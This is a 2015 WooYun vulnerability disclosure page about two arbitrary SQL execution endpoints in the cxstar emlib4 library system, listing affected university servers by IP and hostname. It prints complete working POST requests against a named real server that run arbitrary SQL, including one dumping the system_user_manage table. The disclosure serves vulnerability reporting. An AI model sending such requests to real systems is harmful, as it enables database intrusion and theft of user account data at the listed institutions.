当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105678

漏洞标题:畅想之星图书馆两处任意SQL语句执行漏洞(影响众多大学)

相关厂商:畅想之星

漏洞作者: 路人甲

提交时间:2015-04-07 11:44

修复时间:2015-07-09 17:34

公开时间:2015-07-09 17:34

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向第三方安全合作伙伴开放
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

继上次继续发现多个页面存在任意SQL语句执行

详细说明:

影响众多学校:
官网:

http://www.cxstar.cn/  畅想之星


存在两处任意SQL语句执行漏洞:

1、 POST /emlib4/system/datasource/selectrecordset.aspx
2、 POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined


案例我就懒得找,直接取上次的了:

http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
http://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspx
http://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspx
http://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspx
http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx

漏洞证明:

以清华大学的测试咯?
http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
第一处:

POST /emlib4/system/datasource/selectrecordset.aspx HTTP/1.1
Host: 166.111.120.118
Proxy-Connection: keep-alive
Content-Length: 125
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.2
Origin: http://166.111.120.118
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-type: text/xml; charset=UTF-8
Referer: http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30
<Root><A3020>system</A3020><A3001>SELECT @@version</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">1</A3003></Root>


01.jpg


第二处:

POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined HTTP/1.1
Host: 166.111.120.118
Proxy-Connection: keep-alive
Content-Length: 142
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.2
Origin: http://166.111.120.118
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Content-type: text/xml; charset=UTF-8
Referer: http://166.111.120.118/emlib4/format/release/aspx/EML_INTENET_SY.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30
<Root><A3020>system</A3020><A3001>SELECT * from system_user_manage</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">15</A3003></Root>


02.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-10 17:32

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无